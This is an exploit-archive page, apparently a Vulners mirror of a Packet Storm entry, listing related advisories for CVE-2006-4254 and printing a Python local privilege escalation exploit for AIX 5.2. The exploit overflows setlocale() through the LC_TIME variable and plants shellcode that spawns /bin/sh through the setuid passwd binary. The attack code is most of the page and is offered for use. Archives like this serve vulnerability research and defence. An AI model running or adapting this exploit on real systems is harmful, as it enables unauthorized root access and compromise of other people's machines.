setlocate-local.txt

🗓️ 07 Nov 2007 00:00:00Reported by Thomas PolletType

packetstorm🔗 packetstormsecurity.com👁 31 Views

AIX 5.2 setlocale() exploit with CVE-2006-4254 for AIX 5.2

Reporter	Title	Published	Views	Family All 9
0day.today	IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit	7 Nov 200700:00	–	zdt
CVE	CVE-2006-4254	21 Aug 200620:00	–	cve
Cvelist	CVE-2006-4254	21 Aug 200620:00	–	cvelist
Exploit DB	IBM AIX 5.3.0 - 'setlocale()' Local Privilege Escalation	7 Nov 200700:00	–	exploitdb
EUVD	EUVD-2006-4242	7 Oct 202500:30	–	euvd
exploitpack	IBM AIX 5.3.0 - setlocale() Local Privilege Escalation	7 Nov 200700:00	–	exploitpack
NVD	CVE-2006-4254	21 Aug 200620:04	–	nvd
seebug.org	IBM AIX <= 5.3.0 - setlocale() Local Privilege Escalation Exploit	1 Jul 201400:00	–	seebug
seebug.org	IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit	8 Nov 200700:00	–	seebug

`#  
#setlocale() exploit for aix 5.2 ( CVE-2006-4254 )  
#[email protected]  
#  
from os import execve  
  
bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f"  
egg="\x60"*2350  
shellcode=( # by intropy <at> caughq.org  
"\x7c\xa5\x2a\x79" # xor. r5,r5,r5  
"\x40\x82\xff\xfd" # bnel <shellcode>  
"\x7f\xe8\x02\xa6" # mflr r31  
"\x3b\xff\x01\x20" # cal r31,0x120(r31)  
"\x38\x7f\xff\x08" # cal r3,-248(r31)  
"\x38\x9f\xff\x10" # cal r4,-240(r31)  
"\x90\x7f\xff\x10" # st r3,-240(r31)  
"\x90\xbf\xff\x14" # st r5,-236(r31)  
"\x88\x5f\xff\x0f" # lbz r2,-241(r31)  
"\x98\xbf\xff\x0f" # stb r5,-241(r31)  
"\x4c\xc6\x33\x42" # crorc cr6,cr6,cr6  
"\x44\xff\xff\x02" # svca  
"/bin/sh"  
"\x05")  
  
execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})  
  
`

07 Nov 2007 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.0178